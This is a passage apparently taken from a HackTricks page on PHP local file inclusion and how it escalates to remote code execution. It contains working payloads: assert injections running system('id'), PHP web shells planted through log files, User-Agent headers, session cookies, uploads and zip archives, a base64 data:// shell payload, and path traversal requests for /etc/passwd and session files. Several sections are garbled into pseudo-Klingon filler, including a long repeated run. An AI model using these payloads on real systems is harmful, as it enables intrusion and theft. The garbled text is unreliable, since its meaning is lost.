  • ogg:// — Audio streams (Not useful to read arbitrary files)

LFI via PHP's 'assert'

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is being checked but not properly sanitized.

For example, PHP code might be designed to prevent directory traversal like so:

assert("strpos('$file', '..') === false") or die("");

DaH jImej 'ej qoH *'e'. 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej 'Iv 'e' 'ej **'

' and die(highlight_file('/etc/passwd')) or '

DaH jatlh 'ej vItlhutlh. 'ej, 'ej vItlhutlh.

' and die(system("id")) or '

URL-encode these payloads.

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

PHP Blind Path Traversal

{% hint style="warning" %} This technique is relevant in cases where you control the file path of a PHP function that will access a file but you won't see the content of the file (like a simple call to file()) but the content is not shown. {% endhint %}

In this incredible post it's explained how a blind path traversal can be abused via PHP filter to exfiltrate the content of a file via an error oracle.

As sumary, the technique is using the "UCS-4LE" encoding to make the content of a file so big that the PHP function opening the file will trigger an error.

Then, in order to leak the first char the filter dechunk is used along with other such as base64 or rot13 and finally the filters convert.iconv.UCS-4.UCS-4LE and convert.iconv.UTF16.UTF-16BE are used to place other chars at the beggining and leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

For the technical details check the mentioned post!

LFI2RCE

Remote File Inclusion

Explained previously, follow this link.

Via Apache/Nginx log file

If the Apache or Nginx server is vulnerable to LFI inside the include function you could try to access to /var/log/apache2/access.log or /var/log/nginx/access.log, set inside the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and include that file

{% hint style="warning" %} Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string "quote;", PHP will throw an error there and nothing else will be executed.

Also, make sure you write correctly the payload or PHP will error every time it tries to load the log file and you won't have a second opportunity. {% endhint %}

This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the Shell. The header authorisation "basic" contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Other possible log paths:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Via Email

Send a mail to a internal account (user@localhost) containing your PHP payload like <?php echo system($_REQUEST["cmd"]); ?> and try to include to the mail of the user with a path like /var/mail/<USERNAME> or /var/spool/mail/<USERNAME>

Via /proc/*/fd/*

  1. Upload a lot of shells (for example : 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Via /proc/self/environ

Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Qa'Hom

vaj vay' upload vItlhutlh. vaj inject shell payload vItlhutlh (e.g : <?php system($_GET['c']); ?> ).

http://example.com/index.php?page=path/to/uploaded/file.png

ghItlhvam: DaH jImej, vaj 'e' vItlhutlh. 'e' vItlhutlh 'e' vItlhutlh.

Zip fie upload qar

PHP shell compressed 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh. 'e' vItlhutlh 'e' vItlhutlh.

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

PHP sessions jatlh

Qap website vItlhutlh PHP Session (PHPSESSID) lo'laH.

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

In PHP these sessions are stored into /var/lib/php5/sess\[PHPSESSID]_ files


Klingon Translation:

In PHP vItlhutlh /var/lib/php5/sess\[PHPSESSID]_ files DaH jImej.

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Set the cookie to <?php system('cat /etc/passwd');?>

Klingon Translation:

Set the cookie to <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

LFI (Local File Inclusion)

Description

LFI (Local File Inclusion) is a vulnerability that allows an attacker to include files from the target system. This can be exploited to read sensitive files, execute arbitrary code, or even gain remote code execution.

PHP Session File Inclusion

One common use case of LFI is to include the PHP session file. PHP session files store user session data, including sensitive information such as authentication tokens and user preferences. By exploiting LFI, an attacker can gain access to these session files and potentially hijack user sessions.

To include the PHP session file, the attacker needs to know the path to the session file on the target system. This can often be found by analyzing the application's source code or by using directory traversal techniques.

Once the path to the session file is known, the attacker can craft a request to include the file using the LFI vulnerability. The file will then be parsed by the PHP interpreter, allowing the attacker to access the session data contained within.

Example

Assuming the PHP session file is located at /var/www/sessions/sess_1234567890abcdef, the attacker can include it using the following LFI payload:

http://example.com/vulnerable.php?page=/var/www/sessions/sess_1234567890abcdef

This will cause the vulnerable PHP script to include the session file, making its contents accessible to the attacker.

Mitigation

To prevent PHP session file inclusion vulnerabilities, it is recommended to:

  • Avoid using user-supplied input directly in file inclusion functions.
  • Implement proper input validation and sanitization.
  • Use whitelisting to restrict the allowed file paths.
  • Store session files in a secure location with restricted access permissions.

By following these best practices, you can significantly reduce the risk of LFI vulnerabilities and protect sensitive session data.

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Via ssh

ssh jatlh check qaStaHvIS user (/proc/self/status & /etc/passwd) 'ej try access <HOME>/.ssh/id_rsa

Via vsftpd logs

FTP server vsftpd logs /var/log/vsftpd.log yIqaw. Local File Inclusion (LFI) vulnerability pagh 'e' vsftpd server access possible, steps vay consider:

  1. PHP payload inject username field login process.
  2. Injection jatlh LFI retrieve server logs /var/log/vsftpd.log.

Via php base64 filter (using base64)

This article tlhInganpu' PHP base64 filter Non-base64 ignore. bypass file extension check use base64 end ".php", "." ignore 'ej append "php" base64. Example payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

php filters (ghItlh php filters)

writeup ghItlh php filters arbitrary content generate output. php code arbitrary php code generate include write file ghItlh.

{% content-ref url="lfi2rce-via-php-filters.md" %} lfi2rce-via-php-filters.md {% endcontent-ref %}

segmentation fault (segmentation fault)

Upload file temporary /tmp, request, segmentation fault, temporary file delete search.

{% content-ref url="lfi2rce-via-segmentation-fault.md" %} lfi2rce-via-segmentation-fault.md {% endcontent-ref %}

Nginx temp file storage (Nginx temp file storage)

Local File Inclusion Nginx running PHP RCE technique:

{% content-ref url="lfi2rce-via-nginx-temp-files.md" %} lfi2rce-via-nginx-temp-files.md {% endcontent-ref %}

PHP_SESSION_UPLOAD_PROGRESS (PHP_SESSION_UPLOAD_PROGRESS)

Local File Inclusion session session.auto_start Off. PHP_SESSION_UPLOAD_PROGRESS multipart POST data, PHP enable session. RCE abuse:

{% content-ref url="via-php_session_upload_progress.md" %} via-php_session_upload_progress.md {% endcontent-ref %}

temp file uploads in Windows (temp file uploads in Windows)

Local File Inclusion Windows RCE:

{% content-ref url="lfi2rce-via-temp-file-uploads.md" %} lfi2rce-via-temp-file-uploads.md {% endcontent-ref %}

phpinfo() (file_uploads = on) (phpinfo() (file_uploads = on))

Local File Inclusion phpinfo() file_uploads = on RCE:

{% content-ref url="lfi2rce-via-phpinfo.md" %} lfi2rce-via-phpinfo.md {% endcontent-ref %}

compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure (compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure)

Local File Inclusion exfiltrate path temp file server check file included PHP marks, bypass check Race Condition:

{% content-ref url="lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md" %} lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md {% endcontent-ref %}

eternal waiting + bruteforce (eternal waiting + bruteforce)

LFI upload temporary files server hang PHP execution, brute force filenames hours temporary file:

{% content-ref url="lfi2rce-via-eternal-waiting.md" %} lfi2rce-via-eternal-waiting.md {% endcontent-ref %}

Fatal Error (Fatal Error)

Include /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (Include time throw error).

I don't know how is this useful but it might be.
Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted.

References

{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: